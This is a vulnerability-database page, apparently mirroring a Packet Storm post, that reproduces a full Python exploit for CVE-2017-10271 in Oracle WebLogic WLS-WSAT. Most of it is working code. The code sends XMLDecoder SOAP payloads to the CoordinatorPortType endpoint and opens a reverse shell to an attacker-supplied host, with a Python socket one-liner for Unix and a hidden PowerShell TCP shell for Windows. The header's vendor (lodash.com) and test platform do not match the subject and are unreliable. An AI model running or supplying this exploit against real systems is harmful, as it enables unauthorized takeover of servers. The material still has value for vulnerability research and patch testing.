Vulners
Lucene search
đ Oracle WebLogic WLS-WSAT XMLDecoder Remote Code Execution
đď¸Â 11 May 2026 00:00:00Reported by indoushkaType 
 packetstormđ packetstorm.newsđ 68 Views
10
==================================================================================================================================
| # Title : Oracle WebLogic WLS-WSAT XMLDecoder Remote Code Execution Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://lodash.com/ |
==================================================================================================================================
[+] Summary : This script is a Python-based proof-of-concept exploit targeting a deserialization vulnerability in Oracle WebLogic Serverâs WLS-WSAT component (CVE-2017-10271).
The vulnerability allows unauthenticated attackers to execute arbitrary system commands via crafted SOAP requests sent to the /wls-wsat/CoordinatorPortType endpoint.
The exploit supports both Unix and Windows targets by dynamically generating appropriate command payloads.
It provides two operational modes: a verification mode that triggers an outbound HTTP request to confirm vulnerability,
and an execution mode that attempts to establish a reverse shell connection to the attacker-controlled host.
The tool constructs malicious XML payloads leveraging Javaâs XMLDecoder and ProcessBuilder classes, enabling remote command execution if the target is vulnerable and accessible.
It is intended strictly for security testing and research purposes in controlled environments.
[+] POC :
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from sys import exit
from requests import post
from argparse import ArgumentParser
from random import choice
from string import ascii_uppercase, ascii_lowercase, digits
from xml.sax.saxutils import escape
class Exploit:
def __init__(self, check, rhost, lhost, lport, windows):
self.url = rhost if not rhost.endswith('/') else rhost.strip('/')
self.lhost = lhost
self.lport = lport
self.check = check
if windows:
self.target = 'win'
else:
self.target = 'unix'
if self.target == 'unix':
self.cmd_payload = (
"python -c 'import socket,subprocess,os;"
"s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
"s.connect((\"{lhost}\",{lport}));"
"os.dup2(s.fileno(),0);"
"os.dup2(s.fileno(),1);"
"os.dup2(s.fileno(),2);"
"subprocess.call([\"/bin/sh\",\"-i\"]);'"
).format(lhost=self.lhost, lport=self.lport)
else:
self.cmd_payload = (
r"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) "
r"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='" + self.lhost + r"';"
r"$p='" + self.lport + r"';$c=New-Object system.net.sockets.tcpclient;"
r"$c.connect($a,$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;"
r"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';"
r"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;"
r"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;"
r"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;"
r"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};"
r"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;"
r"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1;"
r"while (($i -gt 0) -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);"
r"$pos+=$r;if (-not $pos -or $pos -eq 0) {RSC};"
r"if ($nb[0..$($pos-1)] -contains 10) {break}};"
r"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);"
r"start-sleep 1;if ($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());"
r"while($os.Peek() -ne -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};"
r"$s.Write($e.GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};"
)
self.cmd_payload = escape(self.cmd_payload)
def cmd_base(self):
return 'cmd' if self.target == 'win' else '/bin/sh'
def cmd_opt(self):
return '/c' if self.target == 'win' else '-c'
def get_generic_check_payload(self):
random_uri = ''.join(
choice(ascii_uppercase + ascii_lowercase + digits)
for _ in range(16))
return '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<object id="url" class="java.net.URL">
<string>http://{lhost}:{lport}/{random_uri}</string>
</object>
<object idref="url">
<void id="stream" method="openStream" />
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>'''.format(
lhost=self.lhost,
lport=self.lport,
random_uri=random_uri
)
def get_process_builder_payload(self):
return '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>{cmd_base}</string>
</void>
<void index="1">
<string>{cmd_opt}</string>
</void>
<void index="2">
<string>{cmd_payload}</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>'''.format(
cmd_base=self.cmd_base(),
cmd_opt=self.cmd_opt(),
cmd_payload=self.cmd_payload
)
def print_banner(self):
print("=" * 80)
print("CVE-2017-10271 RCE Exploit")
print("written by: indoushka")
print("Remote Target: {}".format(self.url))
print("Shell Listener: {}:{}".format(self.lhost, self.lport))
print("=" * 80)
def post_exploit(self, data):
headers = {
"Content-Type": "text/xml;charset=UTF-8",
"User-Agent": "Mozilla/5.0"
}
vulnurl = self.url + "/wls-wsat/CoordinatorPortType"
try:
req = post(vulnurl, data=data, headers=headers, timeout=10, verify=False)
if self.check:
print("[*] Did you get an HTTP GET request back?")
else:
print("[*] Did you get a shell back?")
except Exception as e:
print('[!] Connection Error')
print(e)
def run(self):
self.print_banner()
if self.check:
print('[+] Generating generic check payload')
payload = self.get_generic_check_payload()
else:
print('[+] Generating execution payload')
payload = self.get_process_builder_payload()
print('[*] Generated:')
print(payload)
if self.check:
print('[+] Running generic check payload')
else:
print('[+] Running {} execute payload'.format(self.target))
self.post_exploit(data=payload)
if __name__ == "__main__":
parser = ArgumentParser(description='CVE-2017-10271 WebLogic exploit')
parser.add_argument('-l', '--lhost', required=True, dest='lhost')
parser.add_argument('-p', '--lport', required=True, dest='lport')
parser.add_argument('-r', '--rhost', required=True, dest='rhost')
parser.add_argument('-c', '--check', dest='check', action='store_true')
parser.add_argument('-w', '--win', dest='windows', action='store_true')
args = parser.parse_args()
exploit = Exploit(
check=args.check,
rhost=args.rhost,
lhost=args.lhost,
lport=args.lport,
windows=args.windows
)
exploit.run()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 May 2026 00:00Current
7.7High risk
Vulners AI Score7.7
CVSS 25
CVSS 3.17.5
EPSS0.94439
SSVC